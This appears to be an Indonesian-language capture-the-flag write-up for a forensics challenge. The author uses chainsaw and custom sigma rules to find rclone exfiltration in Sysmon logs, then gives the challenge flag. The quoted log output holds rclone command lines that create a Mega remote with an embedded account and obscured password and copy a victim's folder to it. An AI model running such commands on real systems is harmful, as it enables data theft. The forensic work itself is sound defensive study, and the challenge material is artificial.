Pandora's friend and partner, Wade, is the one that leads the investigation into the relic's location. Recently, he noticed some weird traffic coming from his host. That led him to believe that his host was compromised. After a quick investigation, his fear was confirmed. Pandora tries now to see if the attacker caused the suspicious traffic during the exfiltration phase. Pandora believes that the malicious actor used rclone to exfiltrate Wade's research to the cloud. Using the tool called "chainsaw" and the sigma rules provided, can you detect the usage of rclone from the event logs produced by Sysmon?
Embedded Files
File yang digunakan/diberikan dalam Challenge ini berupa custom sigma rules & windows event logs.
┌──(glmx㉿kali)-[~/Desktop/Packet Cyclone]
└─$ tree
.
├── Logs
│ ├── Application.evtx
│ ├── HardwareEvents.evtx
│ ├── Internet Explorer.evtx
│ ├── Key Management Service.evtx
│ ├── Microsoft-Client-Licensing-Platform%4Admin.evtx
│ ├── Microsoft-Windows-AAD%4Operational.evtx
│ ├── Microsoft-Windows-AppModel-Runtime%4Admin.evtx
│ ├── Microsoft-Windows-AppReadiness%4Admin.evtx
│ ├── Microsoft-Windows-AppReadiness%4Operational.evtx
│ ├── Microsoft-Windows-AppXDeployment%4Operational.evtx
│ ├── Microsoft-Windows-AppXDeploymentServer%4Operational.evtx
│ ├── Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx
│ ├── Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx
│ ├── Microsoft-Windows-Application-Experience%4Program-Compatibility-Troubleshooter.evtx
│ ├── Microsoft-Windows-Application-Experience%4Program-Inventory.evtx
│ ├── Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx
│ ├── Microsoft-Windows-Application-Experience%4Steps-Recorder.evtx
│ ├── Microsoft-Windows-AppxPackaging%4Operational.evtx
│ ├── Microsoft-Windows-Audio%4CaptureMonitor.evtx
│ ├── Microsoft-Windows-Audio%4Operational.evtx
│ ├── Microsoft-Windows-Audio%4PlaybackManager.evtx
│ ├── Microsoft-Windows-Authentication User Interface%4Operational.evtx
│ ├── Microsoft-Windows-Biometrics%4Operational.evtx
│ ├── Microsoft-Windows-BitLocker%4BitLocker Management.evtx
│ ├── Microsoft-Windows-Bits-Client%4Operational.evtx
│ ├── Microsoft-Windows-CloudStore%4Operational.evtx
│ ├── Microsoft-Windows-CodeIntegrity%4Operational.evtx
│ ├── Microsoft-Windows-Containers-BindFlt%4Operational.evtx
│ ├── Microsoft-Windows-Containers-Wcifs%4Operational.evtx
│ ├── Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx
│ ├── Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx
│ ├── Microsoft-Windows-Crypto-DPAPI%4Operational.evtx
│ ├── Microsoft-Windows-Crypto-NCrypt%4Operational.evtx
│ ├── Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx
│ ├── Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Operational.evtx
│ ├── Microsoft-Windows-DeviceSetupManager%4Admin.evtx
│ ├── Microsoft-Windows-DeviceSetupManager%4Operational.evtx
│ ├── Microsoft-Windows-Dhcp-Client%4Admin.evtx
│ ├── Microsoft-Windows-Dhcpv6-Client%4Admin.evtx
│ ├── Microsoft-Windows-Diagnosis-DPS%4Operational.evtx
│ ├── Microsoft-Windows-Diagnosis-PLA%4Operational.evtx
│ ├── Microsoft-Windows-Diagnosis-Scheduled%4Operational.evtx
│ ├── Microsoft-Windows-Diagnosis-Scripted%4Admin.evtx
│ ├── Microsoft-Windows-Diagnosis-Scripted%4Operational.evtx
│ ├── Microsoft-Windows-Diagnostics-Performance%4Operational.evtx
│ ├── Microsoft-Windows-DiskDiagnosticDataCollector%4Operational.evtx
│ ├── Microsoft-Windows-FileHistory-Core%4WHC.evtx
│ ├── Microsoft-Windows-GroupPolicy%4Operational.evtx
│ ├── Microsoft-Windows-HelloForBusiness%4Operational.evtx
│ ├── Microsoft-Windows-HotspotAuth%4Operational.evtx
│ ├── Microsoft-Windows-IKE%4Operational.evtx
│ ├── Microsoft-Windows-Kernel-Boot%4Operational.evtx
│ ├── Microsoft-Windows-Kernel-EventTracing%4Admin.evtx
│ ├── Microsoft-Windows-Kernel-PnP%4Configuration.evtx
│ ├── Microsoft-Windows-Kernel-PnP%4Driver Watchdog.evtx
│ ├── Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx
│ ├── Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx
│ ├── Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx
│ ├── Microsoft-Windows-Kernel-WHEA%4Errors.evtx
│ ├── Microsoft-Windows-Kernel-WHEA%4Operational.evtx
│ ├── Microsoft-Windows-Known Folders API Service.evtx
│ ├── Microsoft-Windows-LanguagePackSetup%4Operational.evtx
│ ├── Microsoft-Windows-LiveId%4Operational.evtx
│ ├── Microsoft-Windows-MUI%4Admin.evtx
│ ├── Microsoft-Windows-MUI%4Operational.evtx
│ ├── Microsoft-Windows-ModernDeployment-Diagnostics-Provider%4Admin.evtx
│ ├── Microsoft-Windows-ModernDeployment-Diagnostics-Provider%4Autopilot.evtx
│ ├── Microsoft-Windows-ModernDeployment-Diagnostics-Provider%4ManagementService.evtx
│ ├── Microsoft-Windows-NCSI%4Operational.evtx
│ ├── Microsoft-Windows-NetworkProfile%4Operational.evtx
│ ├── Microsoft-Windows-Ntfs%4Operational.evtx
│ ├── Microsoft-Windows-Ntfs%4WHC.evtx
│ ├── Microsoft-Windows-Partition%4Diagnostic.evtx
│ ├── Microsoft-Windows-PowerShell%4Admin.evtx
│ ├── Microsoft-Windows-PowerShell%4Operational.evtx
│ ├── Microsoft-Windows-Privacy-Auditing%4Operational.evtx
│ ├── Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx
│ ├── Microsoft-Windows-Provisioning-Diagnostics-Provider%4Admin.evtx
│ ├── Microsoft-Windows-Provisioning-Diagnostics-Provider%4AutoPilot.evtx
│ ├── Microsoft-Windows-Provisioning-Diagnostics-Provider%4ManagementService.evtx
│ ├── Microsoft-Windows-PushNotification-Platform%4Admin.evtx
│ ├── Microsoft-Windows-PushNotification-Platform%4Operational.evtx
│ ├── Microsoft-Windows-ReadyBoost%4Operational.evtx
│ ├── Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx
│ ├── Microsoft-Windows-RestartManager%4Operational.evtx
│ ├── Microsoft-Windows-SMBClient%4Operational.evtx
│ ├── Microsoft-Windows-SMBServer%4Audit.evtx
│ ├── Microsoft-Windows-SMBServer%4Connectivity.evtx
│ ├── Microsoft-Windows-SMBServer%4Operational.evtx
│ ├── Microsoft-Windows-SMBServer%4Security.evtx
│ ├── Microsoft-Windows-Security-Mitigations%4KernelMode.evtx
│ ├── Microsoft-Windows-Security-Mitigations%4UserMode.evtx
│ ├── Microsoft-Windows-Security-SPP-UX-Notifications%4ActionCenter.evtx
│ ├── Microsoft-Windows-SettingSync%4Debug.evtx
│ ├── Microsoft-Windows-SettingSync%4Operational.evtx
│ ├── Microsoft-Windows-Shell-ConnectedAccountState%4ActionCenter.evtx
│ ├── Microsoft-Windows-Shell-Core%4ActionCenter.evtx
│ ├── Microsoft-Windows-Shell-Core%4AppDefaults.evtx
│ ├── Microsoft-Windows-Shell-Core%4LogonTasksChannel.evtx
│ ├── Microsoft-Windows-Shell-Core%4Operational.evtx
│ ├── Microsoft-Windows-ShellCommon-StartLayoutPopulation%4Operational.evtx
│ ├── Microsoft-Windows-SmbClient%4Audit.evtx
│ ├── Microsoft-Windows-SmbClient%4Connectivity.evtx
│ ├── Microsoft-Windows-SmbClient%4Security.evtx
│ ├── Microsoft-Windows-StateRepository%4Operational.evtx
│ ├── Microsoft-Windows-StateRepository%4Restricted.evtx
│ ├── Microsoft-Windows-Storage-Storport%4Health.evtx
│ ├── Microsoft-Windows-Storage-Storport%4Operational.evtx
│ ├── Microsoft-Windows-StorageSpaces-Driver%4Diagnostic.evtx
│ ├── Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx
│ ├── Microsoft-Windows-StorageSpaces-ManagementAgent%4WHC.evtx
│ ├── Microsoft-Windows-Store%4Operational.evtx
│ ├── Microsoft-Windows-Storsvc%4Diagnostic.evtx
│ ├── Microsoft-Windows-Sysmon%4Operational.evtx
│ ├── Microsoft-Windows-TWinUI%4Operational.evtx
│ ├── Microsoft-Windows-TZSync%4Operational.evtx
│ ├── Microsoft-Windows-TaskScheduler%4Maintenance.evtx
│ ├── Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx
│ ├── Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx
│ ├── Microsoft-Windows-Time-Service%4Operational.evtx
│ ├── Microsoft-Windows-UAC%4Operational.evtx
│ ├── Microsoft-Windows-UniversalTelemetryClient%4Operational.evtx
│ ├── Microsoft-Windows-User Device Registration%4Admin.evtx
│ ├── Microsoft-Windows-User Profile Service%4Operational.evtx
│ ├── Microsoft-Windows-UserPnp%4ActionCenter.evtx
│ ├── Microsoft-Windows-UserPnp%4DeviceInstall.evtx
│ ├── Microsoft-Windows-VPN%4Operational.evtx
│ ├── Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx
│ ├── Microsoft-Windows-WER-PayloadHealth%4Operational.evtx
│ ├── Microsoft-Windows-WFP%4Operational.evtx
│ ├── Microsoft-Windows-WMI-Activity%4Operational.evtx
│ ├── Microsoft-Windows-Wcmsvc%4Operational.evtx
│ ├── Microsoft-Windows-WebAuthN%4Operational.evtx
│ ├── Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx
│ ├── Microsoft-Windows-WinRM%4Operational.evtx
│ ├── Microsoft-Windows-Windows Defender%4Operational.evtx
│ ├── Microsoft-Windows-Windows Defender%4WHC.evtx
│ ├── Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx
│ ├── Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx
│ ├── Microsoft-Windows-Windows Firewall With Advanced Security%4FirewallDiagnostics.evtx
│ ├── Microsoft-Windows-WindowsBackup%4ActionCenter.evtx
│ ├── Microsoft-Windows-WindowsSystemAssessmentTool%4Operational.evtx
│ ├── Microsoft-Windows-WindowsUpdateClient%4Operational.evtx
│ ├── Microsoft-Windows-Winlogon%4Operational.evtx
│ ├── Microsoft-Windows-WorkFolders%4WHC.evtx
│ ├── Security.evtx
│ ├── Setup.evtx
│ ├── System.evtx
│ └── Windows PowerShell.evtx
└── sigma_rules
├── rclone_config_creation.yaml
└── rclone_execution.yaml
Apa itu RCLONE?
rclone adalah alat baris perintah (command-line tool) yang digunakan untuk mengelola file di berbagai layanan penyimpanan cloud. Alat ini memungkinkan pengguna untuk menyalin, memindahkan, atau menyinkronkan data antara server lokal dan penyimpanan cloud seperti Google Drive, Amazon S3, Dropbox, OneDrive, dan banyak lagi.
Untuk menelusuri pencarian jejak pencurian data, akan digunakan tool chainsaw dengan 2 custom sigma rule rclone_config_creation.yaml & rclone_execution.yaml
Untuk menghindari kurangnya informasi yang dilihat dari Screenshot, saya berikan output lengkapnya:
Timestamp: 2023-02-24 15:35:07
Detections: Rclone Execution via Command Line or PowerShell
Count: 1
Event.System.Provider: Microsoft-Windows-Sysmon
Event ID: 1
Record ID: 76
Computer: DESKTOP-UTDHED2
Event Data:
- Description: Rsync for cloud storage
- ProcessId: 3820
- ParentProcessGuid: 10DA3E43-D8D2-63F8-9B00-000000000900
- FileVersion: 1.61.1
- ProcessGuid: 10DA3E43-D92B-63F8-B100-000000000900
- LogonGuid: 10DA3E43-D892-63F8-4B6D-030000000000
- ParentCommandLine: '"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
- ParentUser: DESKTOP-UTDHED2\wade
- ParentProcessId: 5888
- ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
- UtcTime: 2023-02-24 15:35:07.336
- RuleName: '-'
- Image: C:\Users\wade\AppData\Local\Temp\rclone-v1.61.1-windows-amd64\rclone.exe
- Company: https://rclone.org
- Product: Rclone
- OriginalFileName: rclone.exe
- CommandLine: '"C:\Users\wade\AppData\Local\Temp\rclone-v1.61.1-windows-amd64\rclone.exe" config create remote mega user majmeret@protonmail.com pass F BMeavdiaFZbWzpMqIVhJCGXZ5XXZI1qsU3EjhoKQw0rEoQqHyI'
- CurrentDirectory: C:\Users\wade\AppData\Local\Temp\rclone-v1.61.1-windows-amd64\
- User: DESKTOP-UTDHED2\wade
- LogonId: '0x36d4b'
- TerminalSessionId: 1
- IntegrityLevel: Medium
- Hashes: SHA256=E94901809FF7CC5168C1E857D4AC9CBB339CA1F6E21DCCE95DFB8E28DF799961
Timestamp: 2023-02-24 15:35:17
Detections: Rclone Execution via Command Line or PowerShell
Count: 1
Event.System.Provider: Microsoft-Windows-Sysmon
Event ID: 1
Record ID: 78
Computer: DESKTOP-UTDHED2
Event Data:
- Description: Rsync for cloud storage
- ProcessId: 5116
- ParentProcessGuid: 10DA3E43-D8D2-63F8-9B00-000000000900
- FileVersion: 1.61.1
- ProcessGuid: 10DA3E43-D935-63F8-B200-000000000900
- LogonGuid: 10DA3E43-D892-63F8-4B6D-030000000000
- ParentCommandLine: '"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
- ParentUser: DESKTOP-UTDHED2\wade
- ParentProcessId: 5888
- ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
- UtcTime: 2023-02-24 15:35:17.516
- RuleName: '-'
- Image: C:\Users\wade\AppData\Local\Temp\rclone-v1.61.1-windows-amd64\rclone.exe
- Company: https://rclone.org
- Product: Rclone
- OriginalFileName: rclone.exe
- CommandLine: '"C:\Users\wade\AppData\Local\Temp\rclone-v1.61.1-windows-amd64\rclone.exe" copy C:\Users\Wade\Desktop\Relic_location\ remote:exfiltration -v'
- CurrentDirectory: C:\Users\wade\AppData\Local\Temp\rclone-v1.61.1-windows-amd64\
- User: DESKTOP-UTDHED2\wade
- LogonId: '0x36d4b'
- TerminalSessionId: 1
- IntegrityLevel: Medium
- Hashes: SHA256=E94901809FF7CC5168C1E857D4AC9CBB339CA1F6E21DCCE95DFB8E28DF799961
Log menunjukkan bahwa rclone digunakan untuk mengeksekusi perintah yang mencurigakan pada sistem User Wade. Aktivitas ini terdeteksi melalui Sysmon, yang mencatat bahwa rclone.exe dijalankan dengan perintah untuk membuat remote dan menyalin data ke cloud menggunakan akun mega. Process rclone dijalankan dari direktori sementara (Temp), yang sering kali digunakan untuk menyembunyikan aktivitas. Selain itu, perintah rclone dijalankan melalui PowerShell, dengan rclone.exe berfungsi sebagai Child Process dari PowerShell, yang merupakan teknik umum yang digunakan oleh penyerang untuk menyembunyikan aktivitas berbahaya.
Setelah di analisis, sekarang ke tahap menjawab pertanyaan tantangan ini dengan cara terhubung ke docker service:
[+] Here is the flag: HTB{Rcl0n3_1s_n0t_s0_inn0c3nt_4ft3r_4ll}
Google Sites
Report abuse